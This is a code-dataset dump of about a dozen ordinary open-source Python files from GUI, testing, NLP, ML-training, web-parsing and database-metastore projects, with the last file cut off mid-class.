max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
src/winforms/toga_winforms/widgets/tree.py
|
luizoti/toga
| 1,261 |
77964
|
from toga_winforms.libs import WinForms
from .base import Widget
class Tree(Widget):
def create(self):
self.native = WinForms.TreeView()
def row_data(self, item):
self.interface.factory.not_implemented('Tree.row_data()')
def on_select(self, selection):
self.interface.factory.not_implemented('Tree.on_select()')
def change_source(self, source):
self.interface.factory.not_implemented('Tree.change_source()')
def insert(self, parent, index, item):
self.interface.factory.not_implemented('Tree.insert()')
def change(self, item):
self.interface.factory.not_implemented('Tree.change()')
def remove(self, parent, index, item):
self.interface.factory.not_implemented('Tree.remove()')
def clear(self):
self.interface.factory.not_implemented('Tree.clear()')
def get_selection(self):
self.interface.factory.not_implemented('Tree.get_selection()')
def set_on_select(self, handler):
self.interface.factory.not_implemented('Tree.set_on_select()')
def set_on_double_click(self, handler):
self.interface.factory.not_implemented('Table.set_on_double_click()')
def scroll_to_node(self, node):
self.interface.factory.not_implemented('Tree.scroll_to_node()')
|
qt4i/driver/host.py
|
beijixing0202/QT4i
| 209 |
77967
|
<gh_stars>100-1000
# -*- coding:utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''RPC Server Host Driver
'''
from __future__ import absolute_import, print_function
import os
import base64
import six
from qt4i.driver.rpc import rpc_method
from qt4i.driver.rpc import RPCEndpoint
from qt4i.driver.tools.dt import DT
from qt4i.driver.xctest.agent import XCUITestAgentManager
BUFFER_SIZE = 1024*1024*100
class RPCServerHost(RPCEndpoint):
"""RPC Server Host API
"""
agent_manager = XCUITestAgentManager()
def __init__(self, rpc_server):
self.rpc_server = rpc_server
RPCEndpoint.__init__(self)
@rpc_method
def pull_file_data(self, filepath, seek_index, buffer_size=BUFFER_SIZE):
'''copy file from rpc server
:param filepath: file path of rpc server
:type filename: str
:returns: six.xmlrpc_client.Binary
'''
if os.path.exists(filepath):
with open(filepath, "rb") as fd:
seek = seek_index * buffer_size
if seek <= os.path.getsize(filepath):
fd.seek(seek)
data = base64.b64encode(fd.read(buffer_size))
return data
return None
else:
raise Exception('file(%s) does not exist' % filepath)
@rpc_method
def push_file_data(self, data, file_path, override=True):
'''push file to rpc server
:param data: str
:param file_path: str
:param override: boolean
:return: boolean
'''
if os.path.exists(file_path) and override:
os.remove(file_path)
with open(file_path, "ab") as fd:
if six.PY3 and isinstance(data, six.string_types):
data = data.encode('utf-8')
fd.write(base64.decodebytes(data))
else:
fd.write(base64.decodestring(data))
return os.path.isfile(file_path)
@rpc_method
def list_devices(self):
'''list all devices of rpc server host
:return: list
'''
return DT().get_devices()
@rpc_method
def list_real_devices(self):
'''list all real iOS devices of rpc server host
:returns: list
'''
return DT().get_real_devices()
@rpc_method
def list_simulators(self):
'''list all iOS simulators of rpc server host
:returns: list
'''
return DT().get_simulators()
@rpc_method
def start_simulator(self, udid=None):
'''start iOS simulator of rpc server host
:param udid: udid of iOS simulator
:type udid: str
:returns: boolean
'''
return DT().start_simulator(udid)
@rpc_method
def get_device_by_udid(self, udid):
'''inquire device by udid
:param udid: udid of device
:type udid: str
:returns: dict or None
'''
return DT().get_device_by_udid(udid)
@rpc_method
def echo(self):
'''test xmlrpc server started
:returns: boolean
'''
return True
@rpc_method
def stop_all_agents(self):
'''
stop all agents
'''
XCUITestAgentManager.stop_all_agents()
|
scripts/templates/a_verify.py
|
eBay/accelerator
| 143 |
77972
|
<filename>scripts/templates/a_verify.py
from math import isnan
from datetime import datetime
import sys
import accelerator
from accelerator.test_methods import test_data
options = dict(n=int, now=datetime)
jobs = ('source',)
nanmarker = object()
def nanfix(values):
def fix(v):
if isinstance(v, float) and isnan(v):
return nanmarker
else:
return v
return list(map(fix, values))
def prepare():
data = jobs.source.load()
assert data['now'] == options.now
if data['py_version'] == 2:
assert data['blaa'] == u'bl\xe5'.encode('utf-8')
else:
assert data['blaa'] == u'bl\xe5'
def analysis(sliceno):
good = test_data.sort_data_for_slice(sliceno)
for lineno, got in enumerate(jobs.source.dataset().iterate(sliceno)):
want = next(good)
assert nanfix(want) == nanfix(got), "Wanted:\n%r\nbut got:\n%r\non line %d in slice %d of %s" % (want, got, lineno, sliceno, jobs.source)
left_over = len(list(good))
assert left_over == 0, "Slice %d of %s missing %d lines" % (sliceno, jobs.source, left_over,)
if jobs.source.load()['py_version'] > 2 and sys.version_info[0] > 2:
assert list(jobs.source.dataset('pickle').iterate(sliceno, 'p')) == [{'sliceno': sliceno}]
def synthesis(job):
p = jobs.source.params
assert p.versions.accelerator == accelerator.__version__
with job.open_input('proj/accelerator.conf') as fh:
for line in fh:
if line.startswith('interpreters: p%d ' % (options.n,)):
path = line.split(' ', 2)[2].strip()[1:-1]
break
else:
raise Exception('Failed to find interpreter #%d in accelerator.conf' % (options.n,))
assert p.versions.python_path == path
|
biostar/utils/spamlib.py
|
tangibleai/biostar-central
| 477 |
77981
|
<reponame>tangibleai/biostar-central
'''
Spam predictor
pip install -U scikit-learn
X are the data features
y are the labels [ 0, 0, 1 ...]
Download the enron database for testing
http://www2.aueb.gr/users/ion/data/enron-spam/
Should work on any of the datasets:
seq 1 6 | parallel -j 1 wget -q -nc http://www.aueb.gr/users/ion/data/enron-spam/preprocessed/enron{}.tar.gz
'''
import logging
import sys, os
import plac
from joblib import dump, load
logger = logging.getLogger("engine")
try:
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline
has_sklearn = True
except ImportError as exc:
logger.error("sklearn not installed, no predictions are generated")
has_sklearn = False
def load_model(model="spam.model"):
nb = load(model)
return nb
def classify_content(content, model):
"""
Classify content
"""
if not has_sklearn:
return 0
try:
nb = load_model(model)
y_pred = nb.predict([content])
except Exception as exc:
logger.error(exc)
y_pred = [0]
return y_pred[0]
def fit_model(X, y):
nb = make_pipeline(
CountVectorizer(),
MultinomialNB(),
# LinearSVC(),
# RandomForestClassifier(),
)
nb.fit(X, y)
return nb
def evaluate_model(fname, model):
X, y = parse_file(fname=fname)
X_train, X_test, y_train, y_test = train_test_split(X, y)
if model:
nb = load_model(model)
else:
nb = fit_model(X_train, y_train)
y_pred = nb.predict(X_test)
rep = classification_report(y_test, y_pred)
print(rep)
def parse_file(fname):
import tarfile
# Take filename from command line
tar = tarfile.open(name=fname, mode='r:gz', fileobj=None)
elems = filter(lambda t: t.isreg(), tar)
X, y = [], []
for info in elems:
# Fill in the labels
y.append(int("spam" in info.name))
stream = tar.extractfile(info)
content = stream.read().decode("utf-8", errors="ignore")
X.append(content)
spam_count = sum(filter(None, y))
ham_count = len(y) - spam_count
logger.info(f"parsed: {ham_count} ham, {spam_count} spam")
return X, y
def build_model(fname, model):
'''
wget -nc http://www.aueb.gr/users/ion/data/enron-spam/preprocessed/enron1.tar.gz
'''
# Generate features.
X, y = parse_file(fname)
# Fits the model.
nb = fit_model(X, y)
logger.info(f"fitted model to: {fname}")
# Save the model.
if model:
logger.info(f"saving model to: {model}")
dump(nb, model)
return nb
# evaluate_model(X, y, model=model)
@plac.pos('fname')
@plac.flg('build')
@plac.flg('eval_', help="evaluate model ")
@plac.opt('model')
@plac.flg('classify')
def main(classify, build, model, eval_, fname):
if build:
build_model(fname=fname, model=model)
if eval_:
evaluate_model(fname=fname, model=model)
if classify:
content = open(fname, 'rt').read()
res = classify_content(content=content, model=model)
print ("spam" if res else "ham")
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
plac.call(main)
|
libs/webargs/falconparser.py
|
Sparklingx/nzbhydra
| 674 |
77986
|
# -*- coding: utf-8 -*-
"""Falcon request argument parsing module.
"""
import falcon
from webargs import core
HTTP_422 = '422 Unprocessable entity'
def parse_json_body(req):
if req.content_length in (None, 0):
# Nothing to do
return {}
content_type = req.get_header('Content-Type')
if content_type and 'application/json' in content_type:
body = req.stream.read()
if body:
try:
return core.parse_json(body)
except (TypeError, ValueError):
pass
return {}
class HTTPError(falcon.HTTPError):
"""HTTPError that stores a dictionary of validation error messages.
"""
def __init__(self, status, errors, *args, **kwargs):
self.errors = errors
super(HTTPError, self).__init__(status, *args, **kwargs)
def to_dict(self, *args, **kwargs):
"""Override `falcon.HTTPError` to include error messages in responses."""
ret = super(HTTPError, self).to_dict(*args, **kwargs)
if self.errors is not None:
ret['errors'] = self.errors
return ret
class FalconParser(core.Parser):
"""Falcon request argument parser."""
def parse_querystring(self, req, name, field):
"""Pull a querystring value from the request."""
return core.get_value(req.params, name, field)
def parse_form(self, req, name, field):
"""Pull a form value from the request."""
return core.get_value(req.params, name, field)
def parse_json(self, req, name, field):
"""Pull a JSON body value from the request."""
json_body = self._cache.get('json')
if json_body is None:
self._cache['json'] = json_body = parse_json_body(req)
return core.get_value(json_body, name, field)
def parse_headers(self, req, name, field):
"""Pull a header value from the request."""
# Use req.get_headers rather than req.headers for performance
return req.get_header(name, required=False) or core.missing
def parse_cookies(self, req, name, field):
"""Pull a cookie value from the request."""
cookies = self._cache.get('cookies')
if cookies is None:
self._cache['cookies'] = cookies = req.cookies
return core.get_value(cookies, name, field)
def get_request_from_view_args(self, view, args, kwargs):
"""Get request from a resource method's arguments. Assumes that
request is the second argument.
"""
req = args[1]
assert isinstance(req, falcon.Request), 'Argument is not a falcon.Request'
return req
def parse_files(self, req, name, field):
raise NotImplementedError('Parsing files not yet supported by {0}'
.format(self.__class__.__name__))
def handle_error(self, error):
"""Handles errors during parsing."""
raise HTTPError(HTTP_422, errors=error.messages)
parser = FalconParser()
use_args = parser.use_args
use_kwargs = parser.use_kwargs
|
airbyte-integrations/bases/airbyte-protocol/airbyte_protocol/models/__init__.py
|
rajatariya21/airbyte
| 6,215 |
78020
|
# generated by generate-protocol-files
from .airbyte_protocol import *
|
examples/all_refs.py
|
wyfo/apimodel
| 118 |
78063
|
from dataclasses import dataclass
from apischema.json_schema import deserialization_schema
@dataclass
class Bar:
baz: str
@dataclass
class Foo:
bar1: Bar
bar2: Bar
assert deserialization_schema(Foo, all_refs=False) == {
"$schema": "http://json-schema.org/draft/2020-12/schema#",
"$defs": {
"Bar": {
"additionalProperties": False,
"properties": {"baz": {"type": "string"}},
"required": ["baz"],
"type": "object",
}
},
"additionalProperties": False,
"properties": {"bar1": {"$ref": "#/$defs/Bar"}, "bar2": {"$ref": "#/$defs/Bar"}},
"required": ["bar1", "bar2"],
"type": "object",
}
assert deserialization_schema(Foo, all_refs=True) == {
"$schema": "http://json-schema.org/draft/2020-12/schema#",
"$defs": {
"Bar": {
"additionalProperties": False,
"properties": {"baz": {"type": "string"}},
"required": ["baz"],
"type": "object",
},
"Foo": {
"additionalProperties": False,
"properties": {
"bar1": {"$ref": "#/$defs/Bar"},
"bar2": {"$ref": "#/$defs/Bar"},
},
"required": ["bar1", "bar2"],
"type": "object",
},
},
"$ref": "#/$defs/Foo",
}
|
ctc_decoder/prefix_search.py
|
TenaciousC22/CTCDecoder
| 705 |
78070
|
import numpy as np
def prefix_search(mat: np.ndarray, chars: str) -> str:
"""Prefix search decoding.
See dissertation of Graves, p63-66.
Args:
mat: Output of neural network of shape TxC.
chars: The set of characters the neural network can recognize, excluding the CTC-blank.
Returns:
The decoded text.
"""
blank_idx = len(chars)
max_T, max_C = mat.shape
# g_n and g_b: gamma in paper
g_n = []
g_b = []
# p(y|x) and p(y...|x), where y is a prefix (not p as in paper to avoid confusion with probability)
prob = {}
prob_ext = {}
# Init: 1-6
for t in range(max_T):
g_n.append({'': 0})
last = g_b[t - 1][''] if t > 0 else 1
g_b.append({'': last * mat[t, blank_idx]})
# init for empty prefix
prob[''] = g_b[max_T - 1]['']
prob_ext[''] = 1 - prob['']
l_star = y_star = ''
Y = {''}
# Algorithm: 8-31
while prob_ext[y_star] > prob[l_star]:
prob_remaining = prob_ext[y_star]
# for all chars
for k in range(max_C - 1):
y = y_star + chars[k]
g_n[0][y] = mat[0, k] if len(y_star) == 0 else 0
g_b[0][y] = 0
prefix_prob = g_n[0][y]
# for all time steps
for t in range(1, max_T):
new_label_prob = g_b[t - 1][y_star] + (
0 if y_star != '' and y_star[-1] == chars[k] else g_n[t - 1][y_star])
g_n[t][y] = mat[t, k] * (new_label_prob + g_n[t - 1][y])
g_b[t][y] = mat[t, blank_idx] * (g_b[t - 1][y] + g_n[t - 1][y])
prefix_prob += mat[t, k] * new_label_prob
prob[y] = g_n[max_T - 1][y] + g_b[max_T - 1][y]
prob_ext[y] = prefix_prob - prob[y]
prob_remaining -= prob_ext[y]
if prob[y] > prob[l_star]:
l_star = y
if prob_ext[y] > prob[l_star]:
Y.add(y)
if prob_remaining <= prob[l_star]:
break
# 30
Y.remove(y_star)
# 31
best_y = None
best_prob_ext = 0
for y in Y:
if prob_ext[y] > best_prob_ext:
best_prob_ext = prob_ext[y]
best_y = y
y_star = best_y
# terminate if no more prefix exists
if best_y is None:
break
# Termination: 33-34
return l_star
def prefix_search_heuristic_split(mat: np.ndarray, chars: str) -> str:
"""Prefix search decoding with heuristic to speed up the algorithm.
Speed up prefix computation by splitting sequence into subsequences as described by Graves (p66).
Args:
mat: Output of neural network of shape TxC.
chars: The set of characters the neural network can recognize, excluding the CTC-blank.
Returns:
The decoded text.
"""
blank_idx = len(chars)
max_T, _ = mat.shape
# split sequence into 3 subsequences, splitting points should be roughly placed at 1/3 and 2/3
split_targets = [int(max_T * 1 / 3), int(max_T * 2 / 3)]
best = [{'target': s, 'bestDist': max_T, 'bestIdx': s} for s in split_targets]
# find good splitting points (blanks above threshold)
thres = 0.9
for t in range(max_T):
for b in best:
if mat[t, blank_idx] > thres and abs(t - b['target']) < b['bestDist']:
b['bestDist'] = abs(t - b['target'])
b['bestIdx'] = t
break
# splitting points plus begin and end of sequence
ranges = [0] + [b['bestIdx'] for b in best] + [max_T]
# do prefix search for each subsequence and concatenate results
res = ''
for i in range(len(ranges) - 1):
beg = ranges[i]
end = ranges[i + 1]
res += prefix_search(mat[beg: end, :], chars)
return res
|
prompt_tuning/spot/data/nli.py
|
dumpmemory/prompt-tuning
| 108 |
78087
|
# Copyright 2022 Google.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Summarization datasets."""
import functools
from prompt_tuning.spot.data import preprocessors as spot_preprocessors
import seqio
from t5.data import tasks as t5_tasks
from t5.evaluation import metrics as t5_metrics
TaskRegistry = seqio.TaskRegistry
MixtureRegistry = seqio.MixtureRegistry
DATASETS = {
'anli_r1': {
'tfds_name': 'anli/r1:0.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'context',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
'anli_r2': {
'tfds_name': 'anli/r2:0.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'context',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
'anli_r3': {
'tfds_name': 'anli/r3:0.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'context',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
'doc_nli': {
'tfds_name': 'doc_nli:1.0.0',
'text_a_key': 'hypothesis',
'text_b_key': 'premise',
'label_names': ['not_entailment', 'entailment'],
},
'snli': {
'tfds_name': 'snli:1.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'premise',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
}
# Register datasets
for dataset in DATASETS:
version = f"v{DATASETS[dataset]['tfds_name'].split(':')[-1].replace('.', '')}"
TaskRegistry.add(
f'spot_{dataset.lower()}_{version}',
source=seqio.TfdsDataSource(tfds_name=DATASETS[dataset]['tfds_name']),
preprocessors=[
functools.partial(
spot_preprocessors.preprocess_text_classification,
text_a_key=DATASETS[dataset]['text_a_key'],
text_b_key=DATASETS[dataset]['text_b_key'],
task_name=dataset,
label_names=DATASETS[dataset]['label_names']),
seqio.preprocessors.tokenize,
seqio.CacheDatasetPlaceholder(),
seqio.preprocessors.append_eos_after_trim,
],
metric_fns=[t5_metrics.accuracy],
output_features=t5_tasks.DEFAULT_OUTPUT_FEATURES)
|
appengine/reddit.py
|
bharati-software/blockly-games-Kannada
| 1,184 |
78088
|
"""Blockly Games: Legacy Reddit to Turtle/Movie router.
Copyright 2014 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""Blockly Games used to use Reddit as a gallery. These URLs still exist.
"""
__author__ = "<EMAIL> (<NAME>)"
import os
import re
app = re.search(r"(\w+)-reddit$", os.environ.get('PATH_INFO', '')).group(1)
uuid = os.environ.get('QUERY_STRING', '')
print("Status: 301 Moved Permanently")
print("Location: /%s?level=10#%s\n" % (app, uuid))
|
temboardui/plugins/pgconf/__init__.py
|
missmoiselle/temboard
| 294 |
78124
|
<filename>temboardui/plugins/pgconf/__init__.py
import logging
from os import path
import tornado.web
from tornado.escape import url_escape, url_unescape
from temboardui.web import (
Blueprint,
HTTPError,
Redirect,
TemplateRenderer,
)
PLUGIN_NAME = 'pgconf'
logger = logging.getLogger(__name__)
blueprint = Blueprint()
blueprint.generic_proxy("/pgconf/configuration", methods=["POST"])
plugin_path = path.dirname(path.realpath(__file__))
render_template = TemplateRenderer(plugin_path + "/templates")
def configuration(config):
return {}
def get_routes(config):
routes = blueprint.rules + [
(
r"/js/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/js"}
),
(
r"/css/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/css"}
),
]
return routes
@blueprint.instance_route("/pgconf/configuration(?:/category/(.+))?",
methods=["GET", "POST"])
def configuration_handler(request, category=None):
request.instance.check_active_plugin(PLUGIN_NAME)
profile = request.instance.get_profile()
agent_username = profile['username']
template_vars = {}
# Deduplicate HTTP prefix of plugin on agent.
prefix = "/pgconf/configuration"
query_filter = request.handler.get_argument('filter', None, strip=True)
status = request.instance.get(prefix + "/status")
categories = request.instance.get(prefix + "/categories")
if category:
category = url_unescape(category)
else:
category = categories['categories'][0]
logger.debug("category=%s", category)
if query_filter:
query = {'filter': query_filter}
configuration_url = prefix
else:
query = {}
configuration_url = prefix + "/category/" + url_escape(category)
configuration = request.instance.get(configuration_url, query=query)
if "POST" == request.method:
settings = {'settings': [
{'name': name, 'setting': value[0]}
for name, value in request.arguments.iteritems()
# 'filter' is not a setting, just ignore it.
if name != 'filter'
]}
try:
request.instance.post(prefix, body=settings)
# Redirect to GET page, same URI.
return Redirect(request.uri)
except HTTPError as e:
# Rerender HTML page with errors.
template_vars['error_code'] = e
template_vars['error_message'] = e.log_message
return render_template(
'configuration.html',
nav=True,
role=request.current_user,
instance=request.instance,
agent_username=agent_username,
plugin=PLUGIN_NAME,
xsession=request.instance.xsession,
current_cat=category,
configuration_categories=categories,
configuration_status=status,
data=configuration,
query_filter=query_filter,
**template_vars
)
|
src/tensorrt/tensorrt-3.0.4/tf_to_trt.py
|
aimuch/AIEnvConfig
| 250 |
78153
|
#
# Copyright 1993-2017 NVIDIA Corporation. All rights reserved.
#
# NOTICE TO LICENSEE:
#
# This source code and/or documentation ("Licensed Deliverables") are
# subject to NVIDIA intellectual property rights under U.S. and
# international Copyright laws.
#
# These Licensed Deliverables contained herein is PROPRIETARY and
# CONFIDENTIAL to NVIDIA and is being provided under the terms and
# conditions of a form of NVIDIA software license agreement by and
# between NVIDIA and Licensee ("License Agreement") or electronically
# accepted by Licensee. Notwithstanding any terms or conditions to
# the contrary in the License Agreement, reproduction or disclosure
# of the Licensed Deliverables to any third party without the express
# written consent of NVIDIA is prohibited.
#
# NOTWITHSTANDING ANY TERMS OR CONDITIONS TO THE CONTRARY IN THE
# LICENSE AGREEMENT, NVIDIA MAKES NO REPRESENTATION ABOUT THE
# SUITABILITY OF THESE LICENSED DELIVERABLES FOR ANY PURPOSE. IT IS
# PROVIDED "AS IS" WITHOUT EXPRESS OR IMPLIED WARRANTY OF ANY KIND.
# NVIDIA DISCLAIMS ALL WARRANTIES WITH REGARD TO THESE LICENSED
# DELIVERABLES, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY,
# NONINFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
# NOTWITHSTANDING ANY TERMS OR CONDITIONS TO THE CONTRARY IN THE
# LICENSE AGREEMENT, IN NO EVENT SHALL NVIDIA BE LIABLE FOR ANY
# SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THESE LICENSED DELIVERABLES.
#
# U.S. Government End Users. These Licensed Deliverables are a
# "commercial item" as that term is defined at 48 C.F.R. 2.101 (OCT
# 1995), consisting of "commercial computer software" and "commercial
# computer software documentation" as such terms are used in 48
# C.F.R. 12.212 (SEPT 1995) and is provided to the U.S. Government
# only as a commercial end item. Consistent with 48 C.F.R.12.212 and
# 48 C.F.R. 227.7202-1 through 227.7202-4 (JUNE 1995), all
# U.S. Government End Users acquire the Licensed Deliverables with
# only those rights set forth herein.
#
# Any use of the Licensed Deliverables in individual and commercial
# software must include, in the user documentation and internal
# comments to the code, the above Disclaimer and U.S. Government End
# Users Notice.
#
#!/usr/bin/python
from __future__ import division
from __future__ import print_function
import os
import sys
from random import randint
import numpy as np
import lenet5
try:
from PIL import Image
import pycuda.driver as cuda
import pycuda.autoinit
import argparse
except ImportError as err:
sys.stderr.write("""ERROR: failed to import module ({})
Please make sure you have pycuda and the example dependencies installed.
https://wiki.tiker.net/PyCuda/Installation/Linux
pip(3) install tensorrt[examples]
""".format(err))
exit(1)
try:
import uff
except ImportError:
raise ImportError("""Please install the UFF Toolkit""")
try:
import tensorrt as trt
from tensorrt.parsers import uffparser
except ImportError as err:
sys.stderr.write("""ERROR: failed to import module ({})
Please make sure you have the TensorRT Library installed
and accessible in your LD_LIBRARY_PATH
""".format(err))
exit(1)
MAX_WORKSPACE = 1 << 30
G_LOGGER = trt.infer.ConsoleLogger(trt.infer.LogSeverity.INFO)
INPUT_W = 28
INPUT_H = 28
OUTPUT_SIZE = 10
MAX_BATCHSIZE = 1
ITERATIONS = 10
# API CHANGE: Try to generalize into a utils function
#Run inference on device
def infer(context, input_img, batch_size):
#load engine
engine = context.get_engine()
assert(engine.get_nb_bindings() == 2)
#create output array to receive data
dims = engine.get_binding_dimensions(1).to_DimsCHW()
elt_count = dims.C() * dims.H() * dims.W() * batch_size
#convert input data to Float32
input_img = input_img.astype(np.float32)
#Allocate pagelocked memory
output = cuda.pagelocked_empty(elt_count, dtype=np.float32)
#alocate device memory
d_input = cuda.mem_alloc(batch_size * input_img.size * input_img.dtype.itemsize)
d_output = cuda.mem_alloc(batch_size * output.size * output.dtype.itemsize)
bindings = [int(d_input), int(d_output)]
stream = cuda.Stream()
#transfer input data to device
cuda.memcpy_htod_async(d_input, input_img, stream)
#execute model
context.enqueue(batch_size, bindings, stream.handle, None)
#transfer predictions back
cuda.memcpy_dtoh_async(output, d_output, stream)
#return predictions
return output
def main():
path = os.path.dirname(os.path.realpath(__file__))
tf_model = lenet5.learn()
uff_model = uff.from_tensorflow(tf_model, ["fc2/Relu"])
#Convert Tensorflow model to TensorRT model
parser = uffparser.create_uff_parser()
parser.register_input("Placeholder", (1, 28, 28), 0)
parser.register_output("fc2/Relu")
engine = trt.utils.uff_to_trt_engine(G_LOGGER,
uff_model,
parser,
MAX_BATCHSIZE,
MAX_WORKSPACE)
assert(engine)
# parser.destroy()
context = engine.create_execution_context()
print("\n| TEST CASE | PREDICTION |")
for i in range(ITERATIONS):
img, label = lenet5.get_testcase()
img = img[0]
label = label[0]
out = infer(context, img, 1)
print("|-----------|------------|")
print("| " + str(label) + " | " + str(np.argmax(out)) + " |")
if __name__ == "__main__":
main()
|
official/modeling/multitask/base_trainer.py
|
62theories/tf-flask
| 82,518 |
78161
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multitask base trainer implementation.
The trainer derives from the Orbit `StandardTrainer` class.
"""
from typing import Union
import gin
import orbit
import tensorflow as tf
from official.modeling.multitask import base_model
from official.modeling.multitask import multitask
@gin.configurable
class MultiTaskBaseTrainer(orbit.StandardTrainer):
"""Multitask base trainer."""
def __init__(self,
multi_task: multitask.MultiTask,
multi_task_model: Union[tf.keras.Model,
base_model.MultiTaskBaseModel],
optimizer: tf.optimizers.Optimizer,
trainer_options=None,
train_datasets=None):
self._strategy = tf.distribute.get_strategy()
self._multi_task = multi_task
self._multi_task_model = multi_task_model
self._optimizer = optimizer
self._training_losses = None
self._training_metrics = None
self._global_step = orbit.utils.create_global_step()
if hasattr(self.multi_task_model, "checkpoint_items"):
checkpoint_items = self.multi_task_model.checkpoint_items
else:
checkpoint_items = {}
self._checkpoint = tf.train.Checkpoint(
model=self.multi_task_model,
optimizer=self.optimizer,
global_step=self.global_step,
**checkpoint_items)
if train_datasets is None:
train_datasets = {}
for name, task in self.multi_task.tasks.items():
train_datasets[name] = orbit.utils.make_distributed_dataset(
self.strategy, task.build_inputs, task.task_config.train_data)
super().__init__(
train_dataset=train_datasets,
options=trainer_options or orbit.StandardTrainerOptions())
def train_loop_begin(self):
"""Clean up states that hold losses and metrics."""
for _, train_loss_metric in self.training_losses.items():
train_loss_metric.reset_states()
for _, metrics in self.training_metrics.items():
for metric in metrics:
metric.reset_states()
def train_loop_end(self):
"""Record loss and metric values per task."""
result = {}
for task_name, loss in self.training_losses.items():
result[task_name] = {loss.name: loss.result()}
for task_name, task_metrics in self.training_metrics.items():
result[task_name].update(
{metric.name: metric.result() for metric in task_metrics})
# Note that, the learning rate schedule is managed by the keras optimizer
# internally, which respects the number of backward pass as `iterations`.
# The learning rate schedule does not follow the trainer logical global
# step of multiple tasks.
if callable(self.optimizer.learning_rate):
result["learning_rate"] = self.optimizer.learning_rate(
self.optimizer.iterations)
else:
result["learning_rate"] = self.optimizer.learning_rate
return result
@property
def checkpoint(self):
"""Accesses the training checkpoint."""
return self._checkpoint
@property
def training_losses(self):
"""Access training loss metric objects for all tasks."""
if self._training_losses is None:
# Builds the per-task metrics and losses.
# This the total summed training loss of tasks in the joint training.
self._training_losses = dict(
total_loss=tf.keras.metrics.Mean("training_loss", dtype=tf.float32))
for name in self.multi_task.tasks:
self._training_losses[name] = tf.keras.metrics.Mean(
"training_loss", dtype=tf.float32)
return self._training_losses
@property
def training_metrics(self):
"""Access training metric metric objects for all tasks."""
if self._training_metrics is None:
# Builds the per-task metrics and losses.
self._training_metrics = {}
for name, task in self.multi_task.tasks.items():
self._training_metrics[name] = task.build_metrics(training=True)
return self._training_metrics
@property
def strategy(self):
return self._strategy
@property
def multi_task(self):
return self._multi_task
@property
def multi_task_model(self):
return self._multi_task_model
@property
def optimizer(self):
return self._optimizer
@property
def global_step(self):
return self._global_step
def train_step(self, iterator_map):
"""The default train step calling the multi-task train step.
Args:
iterator_map: a dictionary of task names and per-task dataset iterators.
"""
def step_fn(inputs):
losses = self.multi_task.joint_train_step(
inputs,
multi_task_model=self.multi_task_model,
optimizer=self.optimizer,
task_metrics=self.training_metrics)
for key, loss in losses.items():
self.training_losses[key].update_state(loss)
self.strategy.run(
step_fn, args=(tf.nest.map_structure(next, iterator_map),))
self.global_step.assign_add(1)
|
querybook/server/lib/metastore/loaders/sqlalchemy_metastore_loader.py
|
shivammmmm/querybook
| 1,144 |
78173
|
<filename>querybook/server/lib/metastore/loaders/sqlalchemy_metastore_loader.py
from typing import Dict, List, Tuple
from lib.metastore.base_metastore_loader import (
BaseMetastoreLoader,
DataTable,
DataColumn,
)
from lib.query_executor.executor_template.templates import sqlalchemy_template
from lib.query_executor.connection_string.sqlalchemy import create_sqlalchemy_engine
class SqlAlchemyMetastoreLoader(BaseMetastoreLoader):
def __init__(self, metastore_dict: Dict):
self._engine, self._inspect, self._conn = self._get_sqlalchemy(metastore_dict)
super(SqlAlchemyMetastoreLoader, self).__init__(metastore_dict)
def __del__(self):
self._conn.close()
del self._inspect
self._engine.dispose()
@classmethod
def get_metastore_params_template(cls):
return sqlalchemy_template
def get_all_schema_names(self) -> List[str]:
